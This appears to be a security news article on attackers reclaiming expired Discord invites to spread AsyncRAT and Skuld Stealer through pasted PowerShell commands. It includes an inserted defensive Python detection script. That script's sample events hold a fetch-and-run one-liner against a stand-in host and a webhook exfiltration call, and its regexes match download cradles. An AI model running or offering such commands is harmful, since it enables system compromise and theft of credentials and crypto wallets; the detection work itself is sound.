A sinister cyber campaign is hijacking expired Discord invite links to trick users into installing powerful malware—stealing crypto wallets, passwords, and browser data while hiding in plain sight.
Key Points at a Glance
- Hackers exploit Discord’s vanity link system to redirect users to malicious servers
- Payloads include AsyncRAT and a custom Skuld Stealer targeting crypto wallets
- Social engineering trick called ClickFix convinces users to execute PowerShell malware
- Malware exfiltrates stolen data via trusted platforms like GitHub and Discord
Cybercriminals have uncovered a subtle vulnerability in Discord’s invite system, and they’re using it to deliver some of the most dangerous malware targeting crypto wallets and personal data. Security experts at Check Point have sounded the alarm over a new campaign that takes expired or deleted Discord invite links—once seen as trustworthy—and reclaims them using Discord’s vanity link feature. The result? Unsuspecting users are being silently redirected into a trap.
The attackers aren’t just hijacking these links—they’re creating entire malicious servers that impersonate real communities. Once inside, users are asked to verify their identity via a sleek-looking interface. But that “Verify” button does more than it promises. Behind it lies ClickFix, a deceptive social engineering tactic that tricks users into running copied PowerShell commands. These commands download and launch malware from remote servers—unleashing AsyncRAT and Skuld Stealer onto the victim’s machine.
AsyncRAT, a powerful remote access trojan, gives hackers full control over the infected system. Using dead drop resolvers and Pastebin as a relay, it communicates with its command-and-control server under the radar. Meanwhile, the Skuld Stealer, written in Go, scours the device for Discord data, browser credentials, and most critically, cryptocurrency wallet information. It’s designed to extract seed phrases and replace legitimate crypto wallet files like those used by Exodus and Atomic with trojanized versions sourced from GitHub.
To make detection even harder, the entire malware delivery and data exfiltration chain uses familiar cloud platforms like GitHub, Bitbucket, Pastebin, and even Discord’s own webhook API. That means most traffic looks completely legitimate to antivirus programs and firewalls.
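The two behaviours described above, a pasted PowerShell one-liner and a Discord webhook used as an exfiltration channel, are what a defender would want to triage for. The following is an added example, not code from the article or from Check Point's research: a heuristic scan over constructed Windows process-creation events. The field names (parent, image, cmd), the parent-process lists and the sample events are assumptions.

```python
import re

# Constructed process-creation events (field names are an assumption, modelled on
# what a Sysmon/EDR export provides: parent image, child image, command line).
SAMPLE_EVENTS = [
    {"parent": "explorer.exe", "image": "powershell.exe",            # pasted into Run dialog
     "cmd": 'powershell -w hidden -c "iwr http://lure.invalid/v.ps1 | iex"'},
    {"parent": "explorer.exe", "image": "powershell.exe",            # benign admin script
     "cmd": r"powershell -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"},
    {"parent": "svchost.exe", "image": "powershell.exe",             # non-browser -> webhook
     "cmd": 'powershell -c "Invoke-RestMethod https://discord.com/api/webhooks/111/abc -Method Post"'},
    {"parent": "explorer.exe", "image": "discord.exe",                # the client itself
     "cmd": "discord.exe https://discord.com/api/webhooks/222/def"},
]

# Download cradles commonly seen in pasted one-liners, and the pieces that turn a
# download into execution or hide the console window.
CRADLE = re.compile(r"(?i)\b(iwr|invoke-webrequest|invoke-restmethod|downloadstring|"
                    r"downloadfile|net\.webclient|curl|wget)\b")
EXEC = re.compile(r"(?i)(\biex\b|invoke-expression|start-process|"
                  r"-e(nc|ncodedcommand)?\b|-w(indowstyle)?\s+hidden)")
WEBHOOK = re.compile(r"(?i)https?://(ptb\.|canary\.)?discord(app)?\.com/api/webhooks/\d+/")
INTERACTIVE_PARENTS = {"explorer.exe", "cmd.exe", "windowsterminal.exe"}  # Run dialog, shells
EXPECTED_WEBHOOK_CLIENTS = {"discord.exe", "chrome.exe", "msedge.exe", "firefox.exe"}


def classify(event):
    """Return the heuristic tags that fire for one process-creation event."""
    tags = []
    image, parent, cmd = event["image"].lower(), event["parent"].lower(), event["cmd"]
    if (image in {"powershell.exe", "pwsh.exe"} and parent in INTERACTIVE_PARENTS
            and CRADLE.search(cmd) and EXEC.search(cmd)):
        tags.append("clickfix_cradle")          # human-pasted download-and-run one-liner
    if WEBHOOK.search(cmd) and image not in EXPECTED_WEBHOOK_CLIENTS:
        tags.append("webhook_from_nonbrowser")  # Discord webhook as an exfil channel
    return tags


def scan(events):
    """Map event index -> tags for every event that triggered at least one heuristic."""
    return {i: t for i, e in enumerate(events) if (t := classify(e))}


if __name__ == "__main__":
    for i, tags in scan(SAMPLE_EVENTS).items():
        print(i, tags, SAMPLE_EVENTS[i]["cmd"])
```

The benign admin script and the Discord client's own webhook call produce no findings, which is the point of pairing the cradle with an interactive parent and the webhook with an unexpected source process.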
The scope of this operation is vast. One variant of the loader was disguised as a game hacktool, downloaded hundreds of times from Bitbucket. Victims are spread across the U.S., Europe, and Asia, signaling a globally coordinated effort. Discord has since disabled the malicious bot used to facilitate the attack, but the vulnerability in link reuse remains unpatched—leaving the door open for future campaigns.
This campaign reveals the risks lurking in the overlooked corners of digital infrastructure. A seemingly harmless expired invite link can become the starting point for full system compromise. For crypto holders and casual Discord users alike, vigilance is no longer optional.
Source: The Hacker News